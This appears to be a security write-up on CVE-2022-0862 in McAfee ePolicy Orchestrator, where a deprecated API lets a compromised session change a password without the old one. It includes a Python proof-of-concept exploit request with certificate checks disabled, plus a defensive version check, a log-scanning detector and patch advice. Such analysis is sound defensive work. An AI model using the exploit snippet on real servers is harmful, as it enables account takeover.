A recently discovered vulnerability in a deprecated API of McAfee Enterprise ePolicy Orchestrator (ePO), identified as CVE-2022-0862, allows a remote attacker to change the password of a compromised session without needing to know the existing user's password. This security flaw impacts ePO versions prior to 5.10 Update 13, and though it was resolved with the release of ePO 5.10 Update 13, it's important to analyze the issue in detail to understand its implications and the steps taken to mitigate the risk.

The Vulnerability

The lack of password change protection vulnerability exists in a deprecated API used by ePO. This API allowed remote attackers to change passwords by making use of an active, compromised session. To exploit this vulnerability, an attacker would not need to know the user's existing password.

The affected functionality was removed from the user interface in ePO 5.10 Update 13, while the API was disabled to prevent further exploitation. However, systems still using ePO versions prior to 5.10 Update 13 remain susceptible to the vulnerability.

To emphasize the risks associated with this vulnerability, let's see a code snippet that demonstrates the potential impact of this security flaw:

import requests

# One session is reused so that the cookies of the (already compromised) login
# are sent with the request. Certificate verification is disabled in the
# original snippet.
session = requests.Session()
session.verify = False

def exploit_vulnerability(session, epo_url, username, new_password):
    # The deprecated API only takes the target user name and the new password;
    # the current password is never checked, which is the flaw behind CVE-2022-0862.
    payload = {"userName": username, "Password": new_password}
    response = session.put(f"{epo_url}/remote/ADUserContext.do?command=updatePassword", data=payload)

    if response.status_code == 200:
        print("Password change successfully exploited!")
    else:
        print("Failed to exploit the vulnerability")

Exploit Details

The exploit detailed above leverages the vulnerability by sending a PUT request to the "/remote/ADUserContext.do?command=updatePassword" endpoint of the targeted ePO server. The payload includes the desired username and a new password, while the old password is not needed. If the session has been successfully compromised, the password change request will be accepted, and the attacker will gain unauthorized access to the user's account.

This vulnerability has been assigned a CVE identifier of CVE-2022-0862, which can be explored on the official National Vulnerability Database (NVD) website.

In addition to disabling the deprecated API, McAfee has implemented other protection mechanisms to reduce the likelihood of this vulnerability being exploited by sending a link to a logged-in user.
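Two checks a defender would want follow from the details above: whether an installed ePO build sorts before 5.10 Update 13, and whether the web server's access log shows any request to the deprecated "/remote/ADUserContext.do?command=updatePassword" endpoint, which has no legitimate use once the API is disabled. The script below is an added example written for this write-up; it is not McAfee code and not part of the original post. It assumes version strings shaped like "5.10 Update 12", assumes the reverse proxy or web server logs in Apache common log format, and uses constructed log lines (placeholder paths and addresses) as input.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Endpoint named in the write-up; any hit on it after patching is worth an alert.
DEPRECATED_ENDPOINT = "/remote/ADUserContext.do"
FIXED_VERSION = (5, 10, 13)  # major, minor, update -> ePO 5.10 Update 13

# Assumed version-string shape: "5.10 Update 12", "5.10.0 Update 13", "5.9.1".
_VERSION_RE = re.compile(
    r"^\s*(\d+)\.(\d+)(?:\.\d+)*\s*(?:update\s*(\d+))?\s*$", re.IGNORECASE
)

def is_affected_version(version: str) -> bool:
    """Return True when the ePO version sorts before 5.10 Update 13."""
    m = _VERSION_RE.match(version)
    if not m:
        raise ValueError(f"unrecognised ePO version string: {version!r}")
    major, minor, update = int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)
    return (major, minor, update) < FIXED_VERSION

# Apache common log format: ip ident user [ts] "METHOD target proto" status size
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

def find_deprecated_api_calls(log_text: str) -> List[Dict[str, str]]:
    """Flag every request to the deprecated password-update command.

    Matching is case-insensitive on path, query key and command value, and is
    done for any HTTP method, so a blocked (403) attempt is still reported.
    """
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue  # not in common log format; skip rather than crash
        parts = urlsplit(m.group("target"))
        if parts.path.lower() != DEPRECATED_ENDPOINT.lower():
            continue
        query = {k.lower(): v for k, v in parse_qs(parts.query).items()}
        commands = [c.lower() for c in query.get("command", [])]
        if "updatepassword" not in commands:
            continue
        hits.append({
            "ip": m.group("ip"),
            "timestamp": m.group("ts"),
            "method": m.group("method").upper(),
            "status": m.group("status"),
        })
    return hits

# Constructed sample log lines (not real ePO traffic): two benign requests,
# two calls to the deprecated endpoint, one malformed line.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [23/Mar/2022:15:20:01 +0000] "GET /example/dashboard HTTP/1.1" 200 5120
10.0.0.9 - - [23/Mar/2022:15:21:13 +0000] "PUT /remote/ADUserContext.do?command=updatePassword HTTP/1.1" 200 312
10.0.0.5 - - [23/Mar/2022:15:22:40 +0000] "POST /example/report HTTP/1.1" 200 2048
10.0.0.9 - - [23/Mar/2022:15:23:02 +0000] "put /remote/ADUserContext.do?Command=UpdatePassword HTTP/1.1" 403 0
this line is not in common log format
"""

if __name__ == "__main__":
    print("5.10 Update 12 affected:", is_affected_version("5.10 Update 12"))
    print("5.10 Update 13 affected:", is_affected_version("5.10 Update 13"))
    for hit in find_deprecated_api_calls(SAMPLE_ACCESS_LOG):
        print(f"ALERT {hit['timestamp']} {hit['ip']} {hit['method']} status={hit['status']}")
```

A 200 response on this endpoint from a build before Update 13 means a password was very likely changed and the affected account should be reviewed; a 403 after patching shows someone is still probing for the deprecated API.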

Recommendations

Users of McAfee ePO are advised to update their software to the latest version, ePO 5.10 Update 13, to prevent any potential exploitation of this vulnerability. Additionally, implement robust security practices:

- Employ multi-factor authentication to secure sensitive access points

- Educate users about identifying and protecting against potential phishing and social engineering attacks

Conclusion

This vulnerability, CVE-2022-0862, is a reminder of the importance of staying up-to-date with security patches and maintaining a strong cybersecurity posture. By updating ePO to the latest version and following best practices for secure systems administration and user awareness, organizations can safeguard their assets from potential exploitation.

Timeline

Published on: 03/23/2022 15:15:00 UTC
Last modified on: 03/29/2022 01:12:00 UTC